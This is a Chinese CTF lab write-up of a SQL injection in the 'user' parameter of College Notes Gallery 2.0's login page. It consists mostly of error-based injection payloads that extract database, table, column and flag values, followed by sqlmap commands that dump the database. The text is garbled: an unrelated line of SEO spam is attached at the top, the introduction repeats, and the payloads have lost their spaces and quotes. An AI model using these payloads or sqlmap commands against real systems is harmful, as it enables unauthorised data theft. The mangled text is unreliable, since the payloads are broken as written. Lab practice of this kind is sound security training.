瓦房店网站制作,网站建设低价建站,网站建设计入哪个科目,编程课网课哪个好简介
College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序#xff0c;访问或修改数据.
正文
这关有我用了两种办法#xff0c;第一种是用报错注入进行手注#xff0c;第二种就是sqlmap…简介
College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序访问或修改数据.
正文
这关有我用了两种办法第一种是用报错注入进行手注第二种就是sqlmap
首先进入靶场我们就可以看到有个login登录的按键直接点进去。 第一种报错注入
进入登录界面那就直接开始测试我们进来就看到这里有个报错那么就很明显的知道这里可以用报错注入。那么就开始测闭合发现是单引号闭合。 爆数据库名
1and(extractvalue(1,concat(0x7e,(selectdatabase()),0x7e)))1-- 爆表名
1and(extractvalue(1,concat(0x7e,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schemanotes),0x7e)))1-- 爆列名
1and(extractvalue(1,concat(0x7e,(selectgroup_concat(column_name)frominformation_schema.columnswheretable_schemanotesandtable_nameflllaaaag),0x7e)))1-- 爆内容
1and(extractvalue(1,concat(0x7e,(selectgroup_concat(flag)fromflllaaaag),0x7e)))1-- 注意
这里因为报错注入输出是有限制长度的所以我们需要用截断函数来把后面的的内容显示出来。
1and(extractvalue(1,concat(0x7e,substr((selectgroup_concat(flag)fromflllaaaag),20,40),0x7e)))1-- 第二种方式sqlmap
爆库名
python sqlmap.py -r 2.txt -batch -dbs 爆表名
python sqlmap.py -r 2.txt -batch -D notes -tables 爆列名
python sqlmap.py -r 2.txt -batch -D notes -T flllaaaag -columns 爆数据
python sqlmap.py -r 2.txt -batch -D notes -T flllaaaag -C flag -dump